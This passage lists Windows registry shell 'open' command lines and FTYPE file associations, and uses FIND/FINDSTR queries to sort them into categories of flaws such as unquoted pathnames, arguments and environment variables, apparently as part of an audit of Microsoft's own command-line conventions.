%SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{725BE8F7-668E-4C7B-8F90-46BDB0936430}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl,@1 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}\Shell\Open\Command (Default) REG_EXPAND_SZ netplwiz.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{87D66A43-7B11-4A28-9811-C86EE395ACF7}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\Shell\Open\Command (Default) REG_SZ C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\shell32.dll,Control_RunDLL C:\Windows\SysWOW64\inetcpl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{B2C761C6-29BC-4f19-9251-E6195265BAF1}\Shell\Open\Command (Default) REG_SZ "C:\Windows\SysWOW64\colorcpl.exe" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\changehomegroupsettings\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\sharewithdevices\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.NetworkAndSharingCenter /page ShareMedia HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\starthomegrouptroubleshooter\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\msdt.exe -id HomegroupDiagnostic HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\viewhomegrouppassword\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup /page Passkey HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{D4480A50-BA28-11d1-8E75-00C04FA31A86}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{E44E5D18-0652-4508-A4E2-8A090067BCB0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.DefaultPrograms HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Contacts\Address Book\Protocols\certificate_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Contacts\Address Book\Protocols\contact_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Contacts\Address Book\Protocols\group_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Contacts\Address Book\Protocols\LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Contacts\Address Book\Protocols\vcard_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Contacts\Address Book\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /showexisting HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Mail\Hotmail\Protocols\mailto\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe "%ProgramFiles%\Internet Explorer\hmmapi.dll",MailToProtocolHandler %1 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Mail\Hotmail\shell\open\command (Default) REG_EXPAND_SZ %systemRoot%\system32\rundll32.exe "%ProgramFiles%\Internet Explorer\hmmapi.dll",OpenInboxHandler HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Media\Windows Media Player\shell\open\command (Default) REG_EXPAND_SZ %ProgramFiles(x86)%\Windows Media Player\wmplayer.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE\shell\naom\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -extoff HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command (Default) REG_SZ C:\Program Files\Internet Explorer\iexplore.exe End of search: 587 match(es) found.Note: only 219 of these 587 command lines comply with Microsoft’s own documentation, while the other 368 command lines show a total number of 573 bugs!
Command lines without a dot, i.e. without any file extension:
FTYPE | FIND.EXE /V "."
batfile="%1" %*
cmdfile="%1" %*
comfile="%1" %*
exefile="%1" %*
MSStorageSense=explorer ms-settings:storagesense
piffile="%1" %*
scrfile="%1" /S
Command lines without a backslash, i.e. without any qualified pathname:
FTYPE | FIND.EXE /V "\"
batfile="%1" %* brmFile="PrintBrmUI.exe" /import /file:"%1" cmdfile="%1" %* comfile="%1" %* exefile="%1" %* MSSppLicenseFile="iexplore.exe" "%1" MSStorageSense=explorer ms-settings:storagesense piffile="%1" %* regedit=regedit.exe "%1" regfile=regedit.exe "%1" scrfile="%1" /S
Command lines without a (double) quote:
FTYPE | FIND.EXE /V """"
CABFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 CompressedFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 Explorer.AssocActionId.BurnSelection=%SystemRoot%\explorer.exe Explorer.AssocActionId.EraseDisc=%SystemRoot%\explorer.exe Explorer.AssocActionId.ZipSelection=%SystemRoot%\explorer.exe Explorer.AssocProtocol.search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L Folder=%SystemRoot%\Explorer.exe hlpfile=%SystemRoot%\winhlp32.exe %1 inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 Microsoft.Workfolders=C:\Windows\System32\control.exe /name Microsoft.WorkFolders ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msime-imepad=C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 ms-msime-imjpdct=C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 ms-perception-simulation=%SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 MSStorageSense=explorer ms-settings:storagesense opensearchdescription=%SystemRoot%\explorer.exe P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 search=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L SHCmdFile=%SystemRoot%\explorer.exe SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 wbcatfile=%SystemRoot%\system32\sdclt.exe /restorepage webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines with an unquoted environment variable in the application’s pathname:
FTYPE | FIND.EXE "=%"
CABFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 CompressedFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 Diagnostic.Cabinet=%SystemRoot%\system32\msdt.exe /cab "%1" Diagnostic.Config=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Document=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Perfmon.Config=%SystemRoot%\system32\perfmon /sys /load "%1" Diagnostic.Perfmon.Document=%SystemRoot%\system32\perfmon /sys /open "%1" Diagnostic.Resmon.Config=%SystemRoot%\system32\perfmon /res /load "%1" evtfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" evtxfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" Explorer.AssocActionId.BurnSelection=%SystemRoot%\explorer.exe Explorer.AssocActionId.EraseDisc=%SystemRoot%\explorer.exe Explorer.AssocActionId.ZipSelection=%SystemRoot%\explorer.exe Explorer.AssocProtocol.search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L Folder=%SystemRoot%\Explorer.exe hlpfile=%SystemRoot%\winhlp32.exe %1 inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-perception-simulation=%SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 mscfile=%SystemRoot%\system32\mmc.exe "%1" %* MSInfoFile=%SystemRoot%\system32\msinfo32.exe "%1" msstylesfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" opensearchdescription=%SystemRoot%\explorer.exe P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 pbkfile=%SystemRoot%\system32\rasphone.exe -f "%1" PerfFile=%SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 search=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L SHCmdFile=%SystemRoot%\explorer.exe SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 Undecided=%SystemRoot%\system32\OpenWith.exe "%1" Unknown=%SystemRoot%\system32\OpenWith.exe "%1" wbcatfile=%SystemRoot%\system32\sdclt.exe /restorepage webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 WindowsStore.License=%SystemRoot%\System32\licensemanagershellext.exe "%1" zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines with an unquoted long
argument:
FTYPE | FIND.EXE /I " %L"
IE.AssocFile.URL="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l InternetShortcut="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l rlogin="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l telnet="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l tn3270="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l WPDContextMenu.Url="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l
Command lines with an unquoted argument:
FTYPE | FIND.EXE " %1"
Application.Manifest="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbApplication %1 Application.Reference="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbShortcut %1|%2 CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 chm.file="%SystemRoot%\hh.exe" %1 CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 ftp="C:\Program Files\Internet Explorer\iexplore.exe" %1 giffile="C:\Program Files\Internet Explorer\iexplore.exe" %1 hlpfile=%SystemRoot%\winhlp32.exe %1 htmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 http="C:\Program Files\Internet Explorer\iexplore.exe" %1 https="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.HTM="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.MHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.PARTIAL="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.SVG="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.XHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.FTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTPS="C:\Program Files\Internet Explorer\iexplore.exe" %1 inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 mhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msdt="%SystemRoot%\system32\msdt.exe" %1 ms-msime-imepad=C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 ms-msime-imjpdct=C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 ms-perception-simulation=%SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe %1 ms-quick-assist="%SystemRoot%\system32\quickassist.exe" %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 MSDASC=Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 prffile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 ratfile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 svgfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 xhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xslfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines with unquoted environment variable(s) in an argument or with unquoted argument(s):
FTYPE | FIND.EXE " %"
Application.Manifest="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbApplication %1 Application.Reference="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbShortcut %1|%2 batfile="%1" %* CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 chm.file="%SystemRoot%\hh.exe" %1 cmdfile="%1" %* comfile="%1" %* CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 exefile="%1" %* ftp="C:\Program Files\Internet Explorer\iexplore.exe" %1 giffile="C:\Program Files\Internet Explorer\iexplore.exe" %1 hlpfile=%SystemRoot%\winhlp32.exe %1 htafile=C:\Windows\SysWOW64\mshta.exe "%1" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}%U{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} %* htmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 http="C:\Program Files\Internet Explorer\iexplore.exe" %1 https="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.HTM="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.MHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.PARTIAL="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.SVG="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.AssocFile.URL="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l IE.AssocFile.WEBSITE="C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* IE.AssocFile.XHT="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.FTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTP="C:\Program Files\Internet Explorer\iexplore.exe" %1 IE.HTTPS="C:\Program Files\Internet Explorer\iexplore.exe" %1 IMEDictionaryCompiler="%WINDIR%\system32\IME\SHARED\imewdbld.exe" "%1" %* inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 InternetShortcut="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l JSEFile=C:\Windows\System32\WScript.exe "%1" %* JSFile=C:\Windows\System32\WScript.exe "%1" %* mhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 Microsoft.System.Update.1="%systemroot%\system32\wusa.exe" "%1" %* Microsoft.Website="C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msdt="%SystemRoot%\system32\msdt.exe" %1 ms-msime-imepad=C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 ms-msime-imjpdct=C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 ms-perception-simulation=%SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe %1 ms-quick-assist="%SystemRoot%\system32\quickassist.exe" %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 mscfile=%SystemRoot%\system32\mmc.exe "%1" %* MSDASC=Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 Msi.Package="%SystemRoot%\System32\msiexec.exe" /i "%1" %* Msi.Patch="%SystemRoot%\System32\msiexec.exe" /p "%1" %* msstylesfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 PerfFile=%SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 piffile="%1" %* prffile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 ratfile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 rlogin="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 svgfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 telnet="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 tn3270="C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 VBEFile="%SystemRoot%\System32\WScript.exe" "%1" %* VBSFile="%SystemRoot%\System32\WScript.exe" "%1" %* webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 Windows.XamlDocument="C:\Windows\System32\PresentationHost.exe" "%1" %* Windows.Xbap="C:\Windows\System32\PresentationHost.exe" "%1" %* WPDContextMenu.Url="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l WSFFile="%SystemRoot%\System32\WScript.exe" "%1" %* WSHFile="%SystemRoot%\System32\WScript.exe" "%1" %* xhtmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xmlfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 xslfile="C:\Program Files\Internet Explorer\iexplore.exe" %1 zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
Command lines containing an environment variable:
SET SLOPPY=APPDATA CommonProgramFiles CommonProgramFiles(x86) CommonProgramW6432 ComSpec LOCALAPPDATA LOGONSERVER ProgramData ProgramFiles ProgramFiles(x86) ProgramW6432 PUBLIC SystemDrive SystemRoot TEMP TMP USERPROFILE WINDIR FTYPE | FINDSTR.EXE /I "%!SLOPPY: =% %!%"
CABFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 certificate_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" chm.file="%SystemRoot%\hh.exe" %1 CompressedFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L contact_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 Diagnostic.Cabinet=%SystemRoot%\system32\msdt.exe /cab "%1" Diagnostic.Config=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Document=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Perfmon.Config=%SystemRoot%\system32\perfmon /sys /load "%1" Diagnostic.Perfmon.Document=%SystemRoot%\system32\perfmon /sys /open "%1" Diagnostic.Resmon.Config=%SystemRoot%\system32\perfmon /res /load "%1" docxfile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" emffile="%systemroot%\system32\mspaint.exe" "%1" evtfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" evtxfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" Explorer.AssocActionId.BurnSelection=%SystemRoot%\explorer.exe Explorer.AssocActionId.EraseDisc=%SystemRoot%\explorer.exe Explorer.AssocActionId.ZipSelection=%SystemRoot%\explorer.exe Explorer.AssocProtocol.search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L Folder=%SystemRoot%\Explorer.exe group_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" hlpfile=%SystemRoot%\winhlp32.exe %1 IMEDictionaryCompiler="%WINDIR%\system32\IME\SHARED\imewdbld.exe" "%1" %* imesxfile="%WINDIR%\system32\IME\SHARED\imesearch.exe" "%1" 